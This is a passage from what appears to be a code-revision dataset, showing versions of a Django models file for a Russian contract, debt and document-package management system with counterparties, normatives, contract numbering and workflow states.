файла', max_length=255, null=\n True, blank=True)\n\n @classmethod\n def initialize_folder(cls, path: str):\n tmp_path = f'{path}/{cls.FOLDER}'\n if not os.path.isdir(tmp_path):\n os.makedirs(tmp_path)\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. \n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents', related_query_name='contragent', null=\n True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True, editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.0)\n tax_count = models.FloatField('Госпошлина', default=0.0)\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n package_state_date = models.DateField('Дата последнего действия', null=\n True, blank=True)\n single_files = GenericRelation(SingleFile)\n pack_files = GenericRelation(PackFile)\n other_files = GenericRelation(OtherFile)\n commentary = GenericRelation(Commentary, related_query_name='package')\n act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(), str(self\n .name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return user.department in depts or user in users\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n self.save()\n\n\n class Meta:\n verbose_name_plural = 'Пакеты документов'\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel', related_name=\n 'document_type')\n states = models.ForeignKey('State', related_name='states', on_delete=\n models.CASCADE, blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate', on_delete=models.\n CASCADE, blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны файлов'\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта', max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name=\n 'normatives', verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Категории нормативов'\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива', null=\n True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива', null\n =True, blank=True)\n value = models.FloatField('Значение норматива (год.)', null=True, blank\n =True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,' +\n f\" действующий с {self.since_date.strftime('%d.%m.%Y')}\" +\n f\" по {self.up_to_date.strftime('%d.%m.%Y')}\")\n\n\n class Meta:\n verbose_name_plural = 'Нормативы'\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{self.date_field.year}/ТКО/01'\n\n\n class Meta:\n verbose_name_plural = 'Сгенерированые номера договоров'\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool=False, exist_number: str=''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n\n class Meta:\n verbose_name_plural = 'Номера договоров'\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n\n class Meta:\n verbose_name_plural = 'Номера документов'\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name_plural = 'Города'\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента', choices=\n KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel', verbose_name=\n 'Тип документа', on_delete=models.CASCADE)\n\n def __str__(self):\n return (\n f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n )\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны документов'\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255, null=True,\n blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n\n class Meta:\n verbose_name_plural = 'Типы документов'\n\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы', related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние', default=False\n )\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return user.is_superuser or user.is_staff or self._is_dept_permitted(\n user.department)\n\n def __str__(self):\n return self.name_state\n\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние', blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние', blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n\n class Meta:\n verbose_name_plural = 'События'\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if not res.active_package else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [(c.department == user.department) for c in\n contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and user in c.current_user:\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user\n ) and user in contragent.current_user:\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\n<mask token>\n",
"step-5": "import datetime\nimport os\nimport uuid\nfrom abc import ABC, abstractmethod\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.contenttypes.fields import (GenericForeignKey,\n GenericRelation)\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\nfrom bluebird.templatetags.template_extra_filters import (plur_form,\nproper_last_name)\nfrom bluebird.tasks import calc_create_gen_async\n\nfrom django_q.tasks import async_task\n\nfrom .snippets import str_add_app, KLASS_TYPES, DOC_TYPE\n\n\nNORM_TYPE = [\n (0, '1 м2 общей площади'),\n (1, '1 место'),\n (2, '1 человек'),\n]\n\n\nPOST_TYPE = [\n (0, 'Клиент-менеджер'),\n (1, 'Старший менеджер по работе с ЮЛ'),\n (2, 'Менеджер'),\n]\n\n\nclass Adress(models.Model):\n state = models.CharField(verbose_name=\"Область\", max_length=255)\n city = models.CharField(verbose_name=\"Город\", max_length=255)\n street = models.CharField(verbose_name=\"Улица\", max_length=255)\n block = models.CharField(verbose_name=\"Номер дома\", max_length=10)\n\n\nclass ContragentClass(models.Model):\n name = models.CharField('Наименование', max_length=255)\n\n\nclass Contragent(models.Model):\n \"\"\"\n Класс Контрагента.\n\n \"\"\"\n # klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)\n klass = models.IntegerField(choices=KLASS_TYPES, default=0)\n excell_name = models.CharField('Наименование контрагента (из Excell)',\n max_length=255)\n dadata_name = models.CharField('Наименование контрагента (из Dadata)',\n max_length=255, blank=True, null=True)\n debt = models.FloatField('Сумма задолжности', default=0.00)\n debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',\n blank=True, null=True)\n inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)\n ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)\n kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)\n\n rs = models.CharField('Р/с', max_length=255, blank=True, null=True)\n ks = models.CharField('К/с', max_length=255, blank=True, null=True)\n bank = models.CharField('Наименование банка', max_length=255, blank=True,\n null=True)\n bik = models.CharField('БИК', max_length=255, blank=True, null=True)\n opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)\n\n director_status = models.CharField('Директор (физ. лицо либо юр. лицо)',\n max_length=255, blank=True, null=True)\n director_name = models.CharField('Имя либо иное наименование директора',\n max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания контрагента (юл)',\n blank=True, null=True)\n is_func = models.BooleanField('Признак активности контрагента',\n default=True)\n okved = models.CharField('ОКВЭД',\n max_length=255, blank=True, null=True)\n\n # TODO REWORK THIS AREA\n physical_address = models.CharField('Физический адресс',\n max_length=255)\n legal_address = models.CharField('Юридический адресс',\n max_length=255, blank=True, null=True)\n # END OF REWORK\n\n norm_value = models.ForeignKey('NormativeCategory',\n related_name='normatives',\n on_delete=models.CASCADE,\n blank=True, null=True)\n stat_value = models.FloatField('Показатель', blank=True, null=True)\n contract_accept_date = models.DateField(\n 'Дата начала оказания услуг',\n default=datetime.date.fromisoformat('2018-07-01'),\n blank=True, null=True\n )\n current_date = models.DateField('Конечная дата оказания услуг',\n default=datetime.date.today, blank=True,\n null=True)\n number_contract = models.OneToOneField('ContractNumberClass',\n on_delete=models.CASCADE,\n max_length=255,\n blank=True, null=True)\n current_contract_date = models.DateField('Дата заключения договора',\n blank=True, null=True)\n signed_user = models.ForeignKey('SignUser', blank=True, null=True,\n on_delete=models.CASCADE,\n related_name='signed')\n\n platform = models.IntegerField('№ площадки',\n blank=True, null=True)\n\n judge_link = models.CharField(verbose_name=\"\", max_length=255,\n blank=True, null=True)\n fss_link = models.CharField(verbose_name=\"\", max_length=255,\n blank=True, null=True)\n\n personal_number = models.CharField(verbose_name=\"Лицевой счет\",\n max_length=255, blank=True, null=True)\n\n passport_number = models.CharField(verbose_name=\"Номер паспорта\",\n max_length=15, blank=True, null=True)\n passport_date = models.DateField(verbose_name=\"Дата выдачи пасспорта\",\n blank=True, null=True)\n passport_origin = models.CharField(verbose_name=\"Кем выдан пасспорт\",\n max_length=15, blank=True, null=True)\n snils = models.CharField(verbose_name=\"СНИЛС\",\n max_length=15, blank=True, null=True)\n\n def create_package_and_folder(self):\n self.check_and_create_parent_folder()\n if not os.path.isdir(self.get_str_as_path()):\n os.mkdir(self.get_str_as_path(), mode=0o777)\n\n def check_and_create_parent_folder(self):\n if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1])):\n os.mkdir(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1]), mode=0o777)\n\n def get_str_as_path(self):\n return os.path.join(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1]),\n f'{self.pk} {self.excell_name}')\n\n @property\n def current_user(self):\n package = self.get_active_package()\n if package:\n res = [user for user in package.package_users.all(\n ) if package.package_state.is_permitted(user)]\n return res\n return None\n\n @current_user.setter\n def current_user(self, user):\n package = self.get_active_package()\n if package and not package.is_user_in_package(user, True):\n package.package_users.add(user)\n package.save()\n\n @property\n def active_package(self):\n return self.get_active_package()\n\n def get_all_packages(self):\n return DocumentsPackage.objects.filter(contragent=self.pk) or None\n\n def get_active_package(self):\n res = DocumentsPackage.get_active_package(self)\n return res\n\n def reset_debt(self):\n self.debt = 0\n self.debt_period = 0\n self.save()\n\n def __str__(self):\n return f'{self.excell_name}'\n\n class Meta:\n verbose_name_plural = \"Контрагенты\"\n\n\nclass SignUser(models.Model):\n name = models.CharField('ФИО отвественного лица', max_length=255)\n document = models.IntegerField('Документ основания', choices=DOC_TYPE,\n default=0)\n position = models.IntegerField('Должность', choices=POST_TYPE,\n default=0)\n doc_number = models.CharField('Номер документа', max_length=255)\n doc_date = models.DateField('Дата начала действия документа')\n address = models.CharField('Адресс', max_length=255)\n city = models.ForeignKey('CityModel', on_delete=models.CASCADE,\n blank=True, null=True)\n tel_number = models.CharField('Телефон', max_length=255, default='')\n sign = models.ImageField('Подпись', upload_to='signs/',\n blank=True, null=True)\n\n def __str__(self):\n # return self.name\n return f\"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}\"\n\n def save(self, *args, **kwargs):\n instance = SignUser.objects.get(id=self.id)\n if self.sign != instance.sign and instance.sign:\n if os.path.exists(instance.sign.url):\n os.remove(instance.sign.url)\n super().save(*args, **kwargs)\n\n class Meta:\n verbose_name_plural = \"Отвественные лица с правом подписи\"\n\n\nclass Commentary(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, blank=True, null=True)\n commentary_text = models.TextField('Комментарий', blank=True, null=True)\n creation_date = models.DateTimeField('Дата создания', auto_now_add=True)\n\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n\nclass AbstractFileModel(models.Model):\n file_name = models.CharField('Название файла', max_length=255,\n null=True, blank=True)\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания файла',\n blank=True, null=True)\n\n # Подгрузка произвольного количества файлов\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n file_type = models.ForeignKey('DocumentTypeModel',\n on_delete=models.CASCADE)\n\n def delete(self, using=None, keep_parents=False):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n return super().delete(using=using, keep_parents=keep_parents)\n\n class Meta:\n abstract = True\n\n\nclass SingleFile(AbstractFileModel):\n\n def __str__(self):\n return str(self.file_type)\n\n class Meta:\n verbose_name_plural = \"Единичные файлы\"\n\n\nclass PackFile(AbstractFileModel):\n unique_number = models.ForeignKey('SyncUniqueNumber',\n on_delete=models.CASCADE,\n null=True, blank=True)\n\n class Meta:\n abstract = False\n verbose_name_plural = \"Фаилы набора\"\n\n def initialize_folder(self, path: str):\n if self.file_type:\n tmp_str_path = plur_form(self.file_type.doc_type)\n if not os.path.isdir(f'{path}/{tmp_str_path}/'):\n os.makedirs(f'{path}/{tmp_str_path}/')\n else:\n raise AttributeError()\n\n def get_files_path(self, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n self.initialize_folder(tmp_path)\n return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')\n\n\ndef other_files_directory_path(instance, filename):\n p = instance.content_object.get_save_path()\n return '{0}/прочие/{1}'.format(p, filename)\n\n\nclass OtherFile(AbstractFileModel):\n file_obj = models.FileField('Произвольные файлы',\n upload_to=other_files_directory_path,\n max_length=500)\n\n commentary = GenericRelation(Commentary, related_query_name='file')\n\n class Meta:\n verbose_name_plural = \"Прочие файлы\"\n\n\nclass ActExam(models.Model):\n FOLDER = 'Акт осмотра/'\n\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n file_name = models.CharField('Название файла', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def initialize_folder(cls, path: str):\n tmp_path = f'{path}/{cls.FOLDER}'\n if not os.path.isdir(tmp_path):\n os.makedirs(tmp_path)\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. \n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents',\n related_query_name='contragent',\n null=True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True,\n editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n\n debt_plan = models.FloatField('Сумма задолжности (плановая)',\n default=0.00)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.00)\n tax_count = models.FloatField('Госпошлина', default=0.00)\n\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n\n package_state_date = models.DateField('Дата последнего действия',\n null=True, blank=True)\n\n single_files = GenericRelation(SingleFile)\n\n pack_files = GenericRelation(PackFile)\n\n other_files = GenericRelation(OtherFile)\n\n commentary = GenericRelation(Commentary, related_query_name='package')\n \n act = models.ForeignKey(ActExam, on_delete=models.CASCADE,\n null=True, blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(),\n str(self.name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return (user.department in depts) or (user in users)\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n # TODO Journal log here!\n self.save()\n\n class Meta:\n verbose_name_plural = \"Пакеты документов\"\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel',\n related_name='document_type')\n states = models.ForeignKey('State', related_name='states',\n on_delete=models.CASCADE,\n blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate',\n on_delete=models.CASCADE,\n blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n class Meta:\n verbose_name_plural = \"Шаблоны файлов\"\n\n# class SingleFilesTemplate(models.Model):\n# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n\n# def __str__(self):\n# return KLASS_TYPES[self.contagent_type][1]\n\n# class Meta:\n# verbose_name_plural = \"Шаблоны единичных файлов\"\n\n\n# class PackFilesTemplate(models.Model):\n# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n# documents = models.ManyToManyField('DocumentTypeModel',\n# related_name='document_type_pack')\n\n# def __str__(self):\n# return KLASS_TYPES[self.contagent_type][1]\n\n# class Meta:\n# verbose_name_plural = \"Шаблоны наборов файлов\"\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта',\n max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name='normatives',\n verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n class Meta:\n verbose_name_plural = \"Категории нормативов\"\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива',\n null=True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива',\n null=True, blank=True)\n value = models.FloatField('Значение норматива (год.)',\n null=True, blank=True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,'\n + f' действующий с {self.since_date.strftime(\"%d.%m.%Y\")}'\n + f' по {self.up_to_date.strftime(\"%d.%m.%Y\")}')\n\n class Meta:\n verbose_name_plural = \"Нормативы\"\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'\n\n class Meta:\n verbose_name_plural = \"Сгенерированые номера договоров\"\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract,\n on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='',\n max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool = False, exist_number: str = ''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n class Meta:\n verbose_name_plural = \"Номера договоров\"\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n class Meta:\n verbose_name_plural = \"Номера документов\"\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Города\"\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента',\n choices=KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel',\n verbose_name='Тип документа',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{str(self.document_type)}|\\\n {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n\n class Meta:\n verbose_name_plural = \"Шаблоны документов\"\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255,\n null=True, blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n class Meta:\n verbose_name_plural = \"Типы документов\"\n\n\n#########\n# State #\n#########\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы',\n related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние',\n default=False)\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in 